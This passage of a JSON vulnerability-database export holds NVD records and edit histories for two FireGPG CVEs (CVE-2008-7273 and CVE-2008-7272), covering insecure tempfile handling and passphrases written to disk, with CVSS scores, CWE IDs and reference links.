"baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cwe": ["CWE-59"], "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 1.2, "vector": "NONE"}}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "hash": "5b731cb69531a1a4f440c98e6086aef32b59d25a21b3e795f6d21cdd0acb5966", "hashmap": [{"hash": "beb519effad5780952ea4ce1697a49ad", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "368a4092894f1320c5eb8d6f1746c872", "key": "modified"}, {"hash": "d613e2c86955266b0d3e0b9be74eae16", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "b066b40875680d07f9f9912048360029", "key": "href"}, {"hash": "85fdbb6779c8f53457b03e4617cac1fd", "key": "extraReferences"}, {"hash": "5a3d95049ed4485340188fd46566963d", "key": "title"}, {"hash": "9c6958cd5dd022a438c0a93346bb7717", "key": "cvelist"}, {"hash": "2323c5f10ea99bff6a3fd88adbf7723c", "key": "affectedSoftware"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "6f6410364e4cee78bd47ed1fc3d8dd5b", "key": "cvss"}, {"hash": "c92f044c94e4360fec268c45081f3bc6", "key": "cwe"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f427291f843f1948956af8f0777cb86f", "key": "description"}, {"hash": "d1c394bb6e6939e65900ac8652bcb35f", "key": "published"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "a6adb76bd2d2e833d4aee455da4b36c3", "key": "cvss2"}, {"hash": "451ac74d9ed8923574ac49d27fa22411", "key": "cpeConfiguration"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "id": "CVE-2008-7273", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2019-11-20T15:56:00", "objectVersion": "1.5", "published": "2019-11-18T22:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7273", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "https://www.openwall.com/lists/oss-security/2011/01/14/2"], "reporter": "cve@mitre.org", "title": "CVE-2008-7273", "type": "cve", "viewCount": 78}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "2323c5f10ea99bff6a3fd88adbf7723c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "b37293c28011cded7e6cea212cc908fa"}, {"key": "cvelist", "hash": "9c6958cd5dd022a438c0a93346bb7717"}, {"key": "cvss", "hash": "6f6410364e4cee78bd47ed1fc3d8dd5b"}, {"key": "cvss2", "hash": "a6adb76bd2d2e833d4aee455da4b36c3"}, {"key": "cvss3", "hash": "beb519effad5780952ea4ce1697a49ad"}, {"key": "cwe", "hash": "c92f044c94e4360fec268c45081f3bc6"}, {"key": "description", "hash": "f427291f843f1948956af8f0777cb86f"}, {"key": "extraReferences", "hash": "85fdbb6779c8f53457b03e4617cac1fd"}, {"key": "href", "hash": "b066b40875680d07f9f9912048360029"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "368a4092894f1320c5eb8d6f1746c872"}, {"key": "published", "hash": "d1c394bb6e6939e65900ac8652bcb35f"}, {"key": "references", "hash": "d613e2c86955266b0d3e0b9be74eae16"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "5a3d95049ed4485340188fd46566963d"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "d695debc34a1657f10acd9dd2989cff4ec01e7bd03c81d546ca7db279f9ade48", "viewCount": 85, "enchantments": {"dependencies": {"references": [], "modified": "2021-04-21T20:41:43", "rev": 2}, "score": {"value": 1.2, "vector": "NONE", "modified": "2021-04-21T20:41:43", "rev": 2}}, "objectVersion": "1.5", "cpe": [], "affectedSoftware": [{"cpeName": "getfiregpg:iceweasel-firegpg", "name": "getfiregpg iceweasel-firegpg", "operator": "lt", "version": "0.6"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": [], "cwe": ["CWE-59"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:iceweasel-firegpg:0.6:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "https://www.openwall.com/lists/oss-security/2011/01/14/2", "refsource": "MISC", "tags": ["Third Party Advisory", "Mailing List"], "url": "https://www.openwall.com/lists/oss-security/2011/01/14/2"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://security-tracker.debian.org/tracker/CVE-2008-7273", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7273"}], "immutableFields": []}, {"id": "CVE-2008-7272", "bulletinFamily": "NVD", "title": "CVE-2008-7272", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "published": "2019-11-08T00:15:00", "modified": "2020-02-10T21:16:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "reporter": "cve@mitre.org", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "cvelist": ["CVE-2008-7272"], "type": "cve", "lastseen": "2021-04-21T20:41:43", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T13:59:22", "references": [], "rev": 2}, "score": {"modified": "2020-09-21T13:59:22", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "f6701a04d3477e440e72324b648d7646a2f9466e07e83e341707bb314aec84a0", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-09-21T13:59:22", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T13:59:22"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 3, "enchantments": {"dependencies": {"modified": "2020-02-11T14:25:16", "references": [], "rev": 2}, "score": {"modified": "2020-02-11T14:25:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "a5439a88032d0d96d6b3b175c5bb2652a08a5ac9dd8565abd675e989e312c52e", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-02-11T14:25:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 10}, "differentElements": ["cvss3", "cpe", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-11T14:25:16"}, {"bulletin": {"affectedSoftware": [{"name": "getfiregpg firegpg", "operator": "eq", "version": "-"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:getfiregpg:firegpg:-"], "cpe23": [], "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user?s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users?s private key.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-11-15T19:55:37", "references": []}, "score": {"modified": "2019-11-15T19:55:37", "value": 2.4, "vector": "NONE"}}, "hash": "05a389bab8cb239109f07a53e4f0a9c76cc24d31548b23dfad15c1385b48f5a5", "hashmap": [{"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "b0552313c96be75e9ec1c10adb56b096", "key": "modified"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "240c2c1dd6f5cc5cbeb07774547c6c2b", "key": "description"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "c78a0c9b48c95bd2d49fb402de9ce674", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "d2db9f7acf8121ca4d72b70e2934db08", "key": "affectedSoftware"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2019-11-15T19:55:37", "modified": "2019-11-14T14:28:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 2}, "differentElements": ["description", "modified"], "edition": 2, "lastseen": "2019-11-15T19:55:37"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "0.6"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "enchantments": {"dependencies": {"modified": "2021-02-02T05:35:21", "references": [], "rev": 2}, "score": {"modified": "2021-02-02T05:35:21", "rev": 2, "value": 2.4, "vector": "NONE"}}, "extraReferences": [{"name": "https://security-tracker.debian.org/tracker/CVE-2008-7272", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://security-tracker.debian.org/tracker/CVE-2008-7272"}, {"name": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect", "refsource": "MISC", "tags": ["Third Party Advisory"], "url": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"}, {"name": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "refsource": "MISC", "tags": ["Third Party Advisory", "Issue Tracking"], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386"}], "hash": "feff88852d5f44ef4f736cb629de97022a0e3f23b99e0deec3d9ee5daaa7d8df", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "4847e3110691b6a6a4c7664c0f127f70", "key": "extraReferences"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "a0acab3127efc281e78e28b6a414532c", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "immutableFields": [], "lastseen": "2021-02-02T05:35:21", "modified": "2020-02-10T21:16:00", "objectVersion": "1.5", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 19}, "different_elements": ["cpeConfiguration"], "edition": 8, "lastseen": "2021-02-02T05:35:21"}, {"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "getfiregpg:firegpg", "name": "getfiregpg firegpg", "operator": "lt", "version": "*"}], "bulletinFamily": "NVD", "cpe": [], "cpe23": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:getfiregpg:firegpg:0.6:*:*:*:*:firefox:*:*", "versionEndExcluding": "0.6", "vulnerable": true}], "operator": "OR"}]}, "cvelist": ["CVE-2008-7272"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "cwe": ["CWE-312"], "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 6, "enchantments": {"dependencies": {"modified": "2020-11-29T22:56:16", "references": [], "rev": 2}, "score": {"modified": "2020-11-29T22:56:16", "rev": 2, "value": 2.4, "vector": "NONE"}}, "hash": "20ae55db346f6babbeac989b07a5b26e855e45e42cfda6773d64bbcb84e4ef79", "hashmap": [{"hash": "d647e62c83e294ffd6f56a7c761beece", "key": "affectedSoftware"}, {"hash": "54b0c94164bf625d039c58f14cd4c116", "key": "references"}, {"hash": "92c16862fafe4d9eb26185434339836e", "key": "cwe"}, {"hash": "5db042f8057f3f288fe9cd4213121eb2", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "767e67f900c3effb5b550959d21fb12e", "key": "cvelist"}, {"hash": "3c75b36a7f1966a251dbe6148b866f97", "key": "modified"}, {"hash": "9bc143c7676b7e5a3fd9537d7507310b", "key": "cvss2"}, {"hash": "675695b80d1f3d2196a77047e1ceba64", "key": "cpeConfiguration"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "1162e82aa1c980ee7ebee4af4c99369c", "key": "published"}, {"hash": "cd391b15e7a01ae2bbfcca256d89bfb8", "key": "cvss3"}, {"hash": "95669953499c0eb40b242611dfbe75d4", "key": "description"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "9258b012e591cc93a7c6b0cd1b5c6b05", "key": "href"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "id": "CVE-2008-7272", "lastseen": "2020-11-29T22:56:16", "modified": "2020-02-10T21:16:00", "objectVersion": "1.3", "published": "2019-11-08T00:15:00", "references": ["https://security-tracker.debian.org/tracker/CVE-2008-7272", "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=514386", "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20757?utm_source=securityvulns&utm_medium=redirect"], "reporter": "cve@mitre.org", "title": "CVE-2008-7272", "type": "cve", "viewCount": 15}, "differentElements": ["affectedSoftware"], "edition": 6, "lastseen": "2020-11-29T22:56:16"}], "edition": 9, "hashmap": [{"key": "affectedConfiguration", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "affectedSoftware", "hash": "a0acab3127efc281e78e28b6a414532c"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpe23", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cpeConfiguration", "hash": "77e03828e2d6f83f8fa932acfe8daff3"}, {"key": "cvelist", "hash": "767e67f900c3effb5b550959d21fb12e"}, {"key": "cvss", "hash": "a89198c45ce87f7ec9735a085150b708"}, {"key": "cvss2", "hash": "9bc143c7676b7e5a3fd9537d7507310b"}, {"key": "cvss3", "hash": "cd391b15e7a01ae2bbfcca256d89bfb8"}, {"key": "cwe", "hash": "92c16862fafe4d9eb26185434339836e"}, {"key": "description", "hash": "95669953499c0eb40b242611dfbe75d4"}, {"key": "extraReferences", "hash": "4847e3110691b6a6a4c7664c0f127f70"}, {"key": "href", "hash": 